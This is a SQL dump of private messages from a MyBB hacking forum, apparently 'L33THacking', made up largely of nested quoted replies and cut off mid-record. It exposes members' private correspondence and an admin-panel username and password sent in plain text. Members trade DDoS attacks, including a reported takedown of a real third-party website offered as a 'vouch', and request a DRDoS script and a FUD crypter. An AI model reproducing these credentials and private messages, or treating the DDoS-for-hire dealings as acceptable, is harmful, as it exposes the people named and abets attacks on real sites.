'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey man', '0', 'Hey dude I have a skype chat started with a few of the members here on LH. Adding more and more members as I go. If you want to join just add me on skype : flamingworm and Ill add you to the chat', '1349658934', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2124', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nSup man. \r\n[/quote]\r\n\r\nNothing, I don\'t know how I just got this PM.', '1348861035', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2126', '100', '20', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"20\";}}', '2', 'Unique Private Section?', '0', 'Hey I can see your in the user group Unique, I am too, and I was wondering where that Unique posting section was. Thanks ~GRONgamer61', '1348861385', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2130', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nI don\'t want to start a fight or anything, but I just want you to [b]try[/b]. Just [b]TRY[/b]. You don\'t have too. But you should [b]TRY[/b].\r\n[b]Try[/b] to make more posts\r\n[b]Try[/b] to be less LQ and more HQ.\r\n[b]Try[/b] to be online more. (More active).\r\n\r\nThat\'s all I want. \r\n[/quote]\r\nFair enough. \r\n', '1348863693', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2132', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/', '1348863821', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2134', '61', '203', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'thread', '0', 'No hard feelings about that thread man. \r\n\r\nI was just letting you know that\'s all.', '1348872847', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2623', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New deal', '0', '[quote=\'t3h jok3r\']\r\nYour staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn.\r\n[/quote]\r\n\r\nYou must be on drugs.', '1349657277', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2151', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Ah kk ;)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/\r\n[/quote]\r\n\r\niTzIpod stays away from hacking and we don\'t have any real hacking section contributor. \r\n[/quote]', '1348888875', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3755', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Hello', '0', 'When is my group Marketers officel on LH?', '1350940404', '0', '3', '1350940459', '1', '0', '2', '1350940427'); INSERT INTO mybb_privatemessages VALUES('3748', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Advertise LH', '0', '[quote=\'t3h jok3r\']\r\nHi XxTREYZxX,\r\n\r\nWe are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url]\r\n\r\n[quote]\r\n1. Do you have any spare email?\r\n2. Do you know any hacker blogs?\r\n3. Can you help advertise on twitter?\r\n4. What search engine do you use?\r\n5. Do you upload videos on youtube?\r\n6. Are you registered on any active site that\'s not related to hacking?\r\n7. Are you registered on hackforums or ubers?\r\n8. If we provide you with programs and ebooks, can you share them on other sites?\r\n[/quote]\r\n\r\nThanks for reading\r\n[/quote]\r\n\r\nof course i will advertise LH\r\n1.no im very sorry only this one but i can make one\r\n2.no i dont sorry\r\n3.i dont have twiiter\r\n4.dont know what this means\r\n5.yes i do upload video\'s on you Tube.\r\n6.yes i am planet minecraft \r\n7.yes ubers and have been for a while now\r\n8.yes of course i will \r\nthere you go', '1350888282', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2157', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'School, GFX, girls hmm assorted other things. :3 you?\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAh kk ;)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/\r\n[/quote]\r\n\r\niTzIpod stays away from hacking and we don\'t have any real hacking section contributor. \r\n[/quote]\r\n[/quote]\r\n\r\nSo what you up to?\r\n[/quote]', '1348889093', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2165', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Is prison break good?\r\n[quote=\'t3h jok3r\']\r\nSchool,Homework, Girls, Website and Prison Break.\r\n[quote=\'Apathy\']\r\nSchool, GFX, girls hmm assorted other things. :3 you?\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAh kk ;)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/\r\n[/quote]\r\n\r\niTzIpod stays away from hacking and we don\'t have any real hacking section contributor. \r\n[/quote]\r\n[/quote]\r\n\r\nSo what you up to?\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1348889503', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2171', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Want that vouch DDoS now?', '0', 'Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.', '1348889905', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2173', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'How?:O\r\n[quote=\'t3h jok3r\']\r\nYup and very educational. \r\n\r\n[quote=\'Apathy\']\r\nIs prison break good?\r\n[quote=\'t3h jok3r\']\r\nSchool,Homework, Girls, Website and Prison Break.\r\n[quote=\'Apathy\']\r\nSchool, GFX, girls hmm assorted other things. :3 you?\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAh kk ;)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/\r\n[/quote]\r\n\r\niTzIpod stays away from hacking and we don\'t have any real hacking section contributor. \r\n[/quote]\r\n[/quote]\r\n\r\nSo what you up to?\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1348890106', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2507', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'You guys looking for anymore staff? I am on like almost all the time and as you can see I am very active. I have experience on other forums and shit with moderating and know the everyday tasks. Just wondering if you are...if not it\'s all good. Or if you need anything else like a news team or something like that i\'m down for it :D. I also made a suggestion for a skype group in the general section :D', '1349497074', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2509', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Upgrade', '0', 'http://l33thacking.net/user-225.html\r\n\r\nCan you upgrade this member to premium hes a very good friend. Ill make sure he\'s HQ.', '1349497104', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2511', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Upgrade', '0', 'http://l33thacking.net/user-225.html\r\n\r\nCan you upgrade this member to premium hes a very good friend. Ill make sure he\'s HQ.', '1349497105', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2505', '225', '100', '225', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Ello!', '0', 'Eyy ima friend of NXK, and i was wondering if you could hook me up with that drdos script. thanks in advance', '1349497061', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2183', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.', '1348890674', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2185', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Maybe tomorrow I am going to hit the sack in a bit.\r\n[quote=\'t3h jok3r\']\r\nCan\'t spoil the suspense :)\r\n\r\nHere\'s the link I use\r\nhttp://www.free-tv-video-online.me/internet/prison_break/\r\n\r\n[quote=\'Apathy\']\r\nHow?:O\r\n[quote=\'t3h jok3r\']\r\nYup and very educational. \r\n\r\n[quote=\'Apathy\']\r\nIs prison break good?\r\n[quote=\'t3h jok3r\']\r\nSchool,Homework, Girls, Website and Prison Break.\r\n[quote=\'Apathy\']\r\nSchool, GFX, girls hmm assorted other things. :3 you?\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAh kk ;)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!\r\n[/quote]\r\n\r\nThanks also what was your username and password to access ACP? It was something like poopie pipe.\r\n\r\nI need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. \r\n[/quote]\r\nIt is:\r\nPoopipie\r\nsosecret32\r\n:P \r\n\r\nAlso when I do make a thread people do not post. :/\r\n[/quote]\r\n\r\niTzIpod stays away from hacking and we don\'t have any real hacking section contributor. \r\n[/quote]\r\n[/quote]\r\n\r\nSo what you up to?\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1348890755', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2190', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST', '1348892612', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2192', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nhttp://i.imgur.com/CWBFc.png', '1348892807', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2648', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey man', '0', '[quote=\'flamingworm\']\r\nHey dude I have a skype chat started with a few of the members here on LH. Adding more and more members as I go. If you want to join just add me on skype : flamingworm and Ill add you to the chat\r\n[/quote]\r\n\r\nOK. ', '1349660258', '0', '1', '0', '1', '0', '0', '1349660362'); INSERT INTO mybb_privatemessages VALUES('2790', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: Why?', '0', '[quote=\'NeonLights\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'NeonLights\']\r\n[quote=\'??????????¢™\']\r\nWhy do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.\r\n[/quote]\r\n\r\nhmm :/\r\ni still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide\r\n\r\n\r\n[/quote]\r\n\r\nWell I still love you NO HOMO\r\n[/quote]\r\n\r\nsame :)\r\njust be more active :/\r\nil remove my rep \r\n[/quote]\r\nI am trying to be as active as I can be.', '1349738295', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2645', '222', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey bro....', '0', 'Hey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm', '1349659746', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2646', '222', '222', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: hey bro....', '0', '[quote=\'flamingworm\']\r\nHey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm\r\n[/quote]\r\n\r\nSure. Adding now.', '1349660235', '0', '1', '0', '1', '0', '2', '1349660450'); INSERT INTO mybb_privatemessages VALUES('2647', '61', '222', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: hey bro....', '0', '[quote=\'flamingworm\']\r\nHey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm\r\n[/quote]\r\n\r\nSure. Adding now.', '1349660235', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3228', '100', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', '[All Members] Advance Member System', '0', 'Here you go, Enjoy http://www.mediafire.com/download.php?hny4mxznomkje5t\r\n\r\nPlease vouch', '1350358061', '0', '1', '0', '1', '0', '2', '1350383227'); INSERT INTO mybb_privatemessages VALUES('3229', '3', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', '[All Members] Advance Member System', '0', 'Here you go, Enjoy http://www.mediafire.com/download.php?hny4mxznomkje5t\r\n\r\nPlease vouch', '1350358061', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3230', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: To?', '0', '[quote=\'Apathy\']\r\nJust wondering why reborn is mod when you said he was banned forever from it. And I think we should implement the rule no post and pm threads. :3\r\n[/quote]\r\n\r\nHe earned his respect back on LH. We do have the rule but I can\'t force it because it will increase leeching and drop activity.', '1350358630', '0', '1', '0', '1', '0', '0', '1350386182'); INSERT INTO mybb_privatemessages VALUES('2643', '243', '214', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Join us.', '0', 'Did you know the site owner is a scammer?\r\nhttp://www.anarchyforums.net/Thread-L33thacking-net?action=lastpost', '1349659142', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2644', '61', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'hey bro....', '0', 'Hey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm', '1349659746', '0', '3', '1349660235', '1', '0', '2', '1349660168'); INSERT INTO mybb_privatemessages VALUES('2219', '205', '203', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: WHATS UP :D', '0', '[quote=\'NeonLights\']\r\nHey what up... im bored\r\n[/quote]\r\n\r\nHey mate, not much, just very busy with all my computational stuff and my site. Going offline from here In 5 or so minutes...\r\n\r\nHope you\'re keeping well :)', '1348961000', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2221', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D', '1348961340', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2224', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!', '1348961814', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2227', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.', '1348961998', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2230', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.\r\n[/quote]\r\n\r\nNope, my PC broke down so I\'m buying a new one. \r\n[/quote]\r\n\r\nThat sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D', '1348962313', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2233', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant 